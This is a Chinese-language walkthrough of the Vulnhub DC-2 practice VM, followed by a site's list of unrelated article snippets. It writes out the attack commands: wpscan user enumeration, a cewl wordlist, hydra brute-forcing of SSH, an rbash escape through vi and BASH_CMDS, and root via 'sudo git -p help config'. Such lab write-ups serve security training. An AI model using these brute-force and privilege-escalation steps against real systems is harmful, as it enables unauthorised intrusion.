Vulnhub靶机:DC2

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:DC2(10.0.2.55)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.55

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:80、7744

在这里插入图片描述

打开网站发现会自动跳转到域名dc-2,在/etc/hosts文件添加一条数据并保存:

10.0.2.55       dc-2

再次访问网站,成功访问,该网站是wordpress框架搭建的

在这里插入图片描述

发现flag1,获得提示使用cewl构造密码字典

在这里插入图片描述

三、漏洞利用

先使用wpscan工具扫描一下,枚举用户名,发现三个用户名:admin、jerry、tom

wpscan --url http://dc-2/ --enumerate u,p,t --plugins-detection aggressive --detection-mode aggressive

在这里插入图片描述

使用cewl工具构造密码字典

cewl http://dc-2/ -w passwd.txt

在这里插入图片描述

使用wpscan工具进行暴力破解得到两组用户名密码:

jerry:adipiscing

tom:parturient

wpscan --url http://dc-2/  -P passwd.txt -U user1.txt

在这里插入图片描述

使用爆破得到的用户名密码登录网站

在这里插入图片描述

发现flag2

在这里插入图片描述
在这里插入图片描述

根据flag2的提示,换另一个切入点,想到靶机还开放了7744端口,可以对这个端口进行暴力破解

hydra -L user1.txt -P passwd.txt ssh://10.0.2.55:7744 -t 64 

在这里插入图片描述

破解得到一组用户名密码:tom:parturient

登录ssh

在这里插入图片描述

四、提权

tom用户的很多命令都被限制了,查看当前目录,发现在usr/bin目录发现存在几个命令的快捷方式,尝试运行这几个命令,发现都可以运行

在这里插入图片描述

可以使用vi进行绕过rbash的限制

vi
:set shell=/bin/bash
:shell

执行命令后发现部分命令可以使用了

在这里插入图片描述

其他的部分命令可以切换目录到/usr/bin/bin,使用./执行

可通过环境变量提权方式,越过rbash限制

export -p        //查看环境变量
BASH_CMDS[a]=/bin/sh;a         //把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin/         //添加环境变量
export PATH=$PATH:/usr/bin      //添加环境变量

查看flag3和flag4

less /home/tom/flag3.txt

在这里插入图片描述

less /home/jerry/flag4.txt

在这里插入图片描述

执行命令./find / -perm -u=s -type f 2>/dev/null,查看具有SUID权限的二进制可执行文件,未发现可以用来进行提权的

在这里插入图片描述

执行命令./sudo -l查看一下具有sudo权限的程序,发现不能执行

在这里插入图片描述

切换目录到/bin,使用su命令切换到jerry用户:jerry:adipiscing

cd /bin
./su jerry

在这里插入图片描述

执行命令sudo -l查看一下具有sudo权限的程序,发现可以无密码以root权限运行git

在这里插入图片描述

使用git命令进行提权

sudo git -p help config
!/bin/sh

在这里插入图片描述

获取flag

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/467189.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

L2-001 紧急救援

一、题目 二、解题思路 迪杰斯特拉算法。求最短路径的条数:在更新T时,如果是 dis[j]>dis[index]map[index][j] ,则 cot[j]cot[index] ,如果是 dis[j]dis[index]map[index][j] ,则 cot[j]cot[index] 。递归输出最短…

RestFul的认识

前言 RESTful 是 Representational State Transfer 的缩写,是一种软件架构风格,用于在网络上构建和整合应用程序。它基于 HTTP 协议,并定义了一组约束和规范,用于规范客户端和服务器之间的通信。 RESTful API 是遵循 REST 架构规…

Tied Block Convolution: 具有共享较薄滤波器的更简洁、更出色的CNN

摘要 https://arxiv.org/pdf/2009.12021.pdf 卷积是卷积神经网络(CNN)的主要构建块。我们观察到,随着通道数的增加,优化后的CNN通常具有高度相关的滤波器,这降低了特征表示的表达力。我们提出了Tied Block Convolutio…

InternLM大模型实战-6.OpenCompass大模型评测

文章目录 前言笔记正文关于模型评测的三个问题为什么需要评测我们需要测什么怎么测试大语言模型 主流大模型评测框架OpenCompass大模型评测领域的挑战 前言 本文是对于InternLM全链路开源体系系列课程的学习笔记。【OpenCompass 大模型评测】 https://www.bilibili.com/video/…

软件测试 - 测试用例设计方法之等价类划分和边界值分析

1. 等价类划分法 1.1 基本理论 等价类划分法是通过科学的方法找到具有共同特性的测试输入的集合,避免进行穷举测试,大大减少了测试用例的数量,从而提高测试效率。等价类划分法的典型应用场景就是输入框,适用于较少数量输入框的场…

LeetCode 0987.二叉树的垂序遍历:遍历时存节点信息,遍历完自定义排序

【LetMeFly】987.二叉树的垂序遍历:遍历时存节点信息,遍历完自定义排序 力扣题目链接:https://leetcode.cn/problems/vertical-order-traversal-of-a-binary-tree/ 给你二叉树的根结点 root ,请你设计算法计算二叉树的 垂序遍历…

《Linux 简易速速上手小册》第7章: 网络配置与管理(2024 最新版)

文章目录 7.1 Linux 网络基础7.1.1 重点基础知识7.1.2 重点案例:配置静态 IP 地址7.1.3 拓展案例 1:使用 nmcli 配置网络(适用于 Fedora/CentOS)7.1.4 拓展案例 2:配置无线网络连接 7.2 静态与动态 IP 配置7.2.1 重点基…

Java学习18-- Override方法重写【★】

重点:super类 & 方法重写 ★看不明白多看几遍,记住static优先级>>高于override 重写Override methods★ 重写Override:child class可以覆盖father class中的method,即子类child class和父类father class有相同名称、…

【Java程序设计】【C00252】基于Springboot的实习管理系统(有论文)

基于Springboot的实习管理系统(有论文) 项目简介项目获取开发环境项目技术运行截图 项目简介 这是一个基于Springboot的实习管理系统 本系统分为前台功能模块、管理员功能模块、教师功能模块、学生功能模块以及实习单位功能模块。 前台功能模块&#xf…

洛谷: [CSP-J 2023] 小苹果

题目描述 小 Y 的桌子上放着 n n n 个苹果从左到右排成一列,编号为从 1 1 1 到 n n n。 小苞是小 Y 的好朋友,每天她都会从中拿走一些苹果。 每天在拿的时候,小苞都是从左侧第 1 1 1 个苹果开始、每隔 2 2 2 个苹果拿走 1 1 1 个苹果…

MIT-Missing Semester_Topic 3:Editors (Vim) 练习题

文章目录 练习一练习二练习三练习四练习五练习六练习七练习八 本 Topic 的 MIT 讲解网页(练习题未给解答) 练习一 自行完成 vimtutor。vimtutor 是 Vim 本身附带的一个入门教程,在 shell 中直接输入 vimtutor 便能运行。注意该教程在 8024 大…

剑指offer——旋转数组的最小数字

目录 1. 题目描述2. 分析思路2.1 示例分析 3. 更完美的做法 1. 题目描述 把一个数组最开始的若干个元素搬到数组的末尾,我们称之为数组的旋转。输入一个递增排序的数组的一个旋转,输出旋转数组的最小元素。例如数组{3.4,5,1.2}为{1.2,3,4,5}的一个旋转&a…